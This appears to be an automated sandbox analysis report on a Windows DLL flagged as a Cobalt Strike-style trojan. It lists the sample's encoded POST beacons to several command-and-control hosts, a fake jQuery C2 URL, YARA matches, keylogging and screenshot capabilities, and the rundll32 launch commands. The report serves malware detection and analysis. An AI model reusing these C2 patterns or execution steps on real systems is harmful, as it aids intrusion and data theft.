Source: global traffic HTTP traffic detected: POST /pcQLeLMbur/PAUpKBYYDz0bHQkGMRZ/eSJCfXZ5ZHp6d2V4ZXs= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: global traffic HTTP traffic detected: POST /pcQLeLMbur/fBM5IDlCe3J+YXp8c2J9ZX0= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: global traffic HTTP traffic detected: POST /pcQLeLMbur/JS4leCwTGiojLgAhfiAeJXl4JCkFHUJ9dnlkenp3ZXhlew== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: global traffic HTTP traffic detected: POST /pcQLeLMbur/LDhzdH4lGnwaNw4PfworLCkHdSkEGjIvdnMoAkV+cnhlfXlzZHlieA== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: global traffic HTTP traffic detected: POST /pcQLeLMbur/cjsfHAk/MzgAfhp+DBgAGz0PeyQgQ3p1fWV7fXRheWR8 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: global traffic HTTP traffic detected: POST /pcQLeLMbur/GzsaeR8FDw4qOh8mCAR2HDoCFS4bAhxFfnJ4ZX15c2R5Yng= HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: global traffic HTTP traffic detected: POST /pcQLeLMbur/Hh4hIBsEGSF/JgN9ARgdOCgSRX5yeGV9eXNkeWJ4 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: global traffic HTTP traffic detected: POST /pcQLeLMbur/enl4GDYcBgIOewx5OBp/MiEbKDx8AkJ9dnlkenp3ZXhlew== HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: global traffic HTTP traffic detected: POST /pcQLeLMbur/eX0ALgEICTI4BRlyQn12eWR6endleGV7 HTTP/1.1Host: mohsinkhanfoundation.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: global traffic HTTP traffic detected: POST /xj3BhHtMbf/PnwTCj8/DwIceXNDenV9ZXt9dGF5ZHw= HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: global traffic HTTP traffic detected: POST /xj3BhHtMbf/cxAvGkZ6c3lifn1yZX5hfA== HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: global traffic HTTP traffic detected: POST /xj3BhHtMbf/ew0TDR8RAgoIfT0bIEV+cnhlfXlzZHlieA== HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: global traffic HTTP traffic detected: POST /xj3BhHtMbf/OTo6JTgvJXgEPS9DenV9ZXt9dGF5ZHw= HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: global traffic HTTP traffic detected: POST /xj3BhHtMbf/fTB4IBwfOiwYPxk6GRosPCV9BAJzPwp0C3IvDkV+cnhlfXlzZHlieA== HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: global traffic HTTP traffic detected: POST /xj3BhHtMbf/EQsPOCI9HT0CfXsGCQQcIA59PT18Q3p1fWV7fXRheWR8 HTTP/1.1Host: lendbiz.vnContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49753 -> 23.82.140.206:8080
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.82.140.206
Source: loaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000002.519163002.0000000003760000.00000004.00000040.sdmp String found in binary or memory: http://code.jquery.com/
Source: loaddll32.exe, 00000000.00000003.265875146.0000000003605000.00000004.00000001.sdmp String found in binary or memory: http://code.jquery.com/1
Source: loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org0
Source: WerFault.exe, 00000006.00000002.282801606.0000000004E6B000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.258956287.0000000000ABC000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.winI
Source: loaddll32.exe, 00000000.00000003.258956287.0000000000ABC000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/a
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: C8408FE5CA4467EE4DA84A76EF238FE3.0.dr String found in binary or memory: http://r3.i.lencr.org/
Source: loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmp String found in binary or memory: http://r3.i.lencr.org/0
Source: loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: loaddll32.exe, 00000000.00000003.328566447.0000000000A99000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.282801606.0000000004E6B000.00000004.00000001.sdmp, C8408FE5CA4467EE4DA84A76EF238FE30.0.dr String found in binary or memory: http://x1.c.lencr.org/0
Source: 2D85F72862B55C4EADD9E66E06947F3D.0.dr String found in binary or memory: http://x1.i.lencr.org/
Source: loaddll32.exe, 00000000.00000003.328566447.0000000000A99000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.282801606.0000000004E6B000.00000004.00000001.sdmp, C8408FE5CA4467EE4DA84A76EF238FE30.0.dr String found in binary or memory: http://x1.i.lencr.org/0
Source: loaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmp String found in binary or memory: https://23.82.140.206:8080/
Source: loaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmp String found in binary or memory: https://23.82.140.206:8080/mpersonation
Source: loaddll32.exe, 00000000.00000003.328522826.0000000000AB8000.00000004.00000001.sdmp String found in binary or memory: https://tuxsecuritybiness.com/
Source: loaddll32.exe, 00000000.00000003.266948088.0000000000AB8000.00000004.00000001.sdmp String found in binary or memory: https://tuxsecuritybiness.com/v
Source: loaddll32.exe, 00000000.00000002.519109976.0000000003669000.00000004.00000001.sdmp String found in binary or memory: https://tuxsecuritybiness.com:8080/
Source: loaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.357019934.00000000035FD000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.324864290.0000000003605000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmp String found in binary or memory: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.js
Source: loaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmp String found in binary or memory: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsVw
Source: loaddll32.exe, 00000000.00000003.311329972.0000000003605000.00000004.00000001.sdmp String found in binary or memory: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsfw
Source: loaddll32.exe, 00000000.00000003.286730458.0000000000AB8000.00000004.00000001.sdmp String found in binary or memory: https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsmohsinkhanfoundation.com
Source: unknown HTTP traffic detected: POST /QthLWsZsVgb/OQsaDixzHTgtfjMcGypGenN5Yn59cmV+YXw= HTTP/1.1Host: hoteloaktree.comContent-Length: 80Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
Source: unknown DNS traffic detected: queries for: hoteloaktree.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to record screenshots
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_009622E0 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 3_2_009622E0
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0097088C SetDisplayAutoRotationPreferences,SetGestureConfig,SetInternalWindowPos,SetKeyboardState,SetMagnificationLensCtxInformation,SetMirrorRendering,GetKeyboardState,SetShellWindowEx, 3_2_0097088C

E-Banking Fraud:

barindex
Drops certificate files (DER)
Source: C:\Windows\System32\loaddll32.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8408FE5CA4467EE4DA84A76EF238FE3 Jump to dropped file
Source: C:\Windows\System32\loaddll32.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D Jump to dropped file

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, type: MEMORY Matched rule: Trojan_Raw_Generic_4 Author: FireEye
Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, type: MEMORY Matched rule: Trojan_Raw_Generic_4 Author: FireEye
Uses 32bit PE files
Source: p2SijKiqgZ.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Yara signature match
Source: 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000000.00000002.516568277.00000000009F0000.00000004.00000020.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, type: MEMORY Matched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, type: MEMORY Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, type: MEMORY Matched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, type: MEMORY Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
One or more processes crash
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6688 -s 732
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04570C64 3_2_04570C64
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_045709F4 3_2_045709F4
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 00946354 appears 48 times
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00968354 NtdllDefWindowProc_A, 3_2_00968354
PE file contains strange resources
Source: p2SijKiqgZ.dll Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: p2SijKiqgZ.dll ReversingLabs: Detection: 15%
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6688 -s 732
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8408FE5CA4467EE4DA84A76EF238FE3 Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER920C.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winDLL@6/10@207/6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00948554 GetDiskFreeSpaceA, 3_2_00948554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00960800 GetLastError,FormatMessageA, 3_2_00960800
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6688
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00959220 FindResourceA,LoadResource,SizeofResource,LockResource, 3_2_00959220
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000006.00000003.259967612.0000000004F0D000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: version.pdb} source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000006.00000003.265608168.0000000004C56000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000006.00000003.265587700.0000000004C50000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000006.00000003.265560941.00000000053A1000.00000004.00000001.sdmp
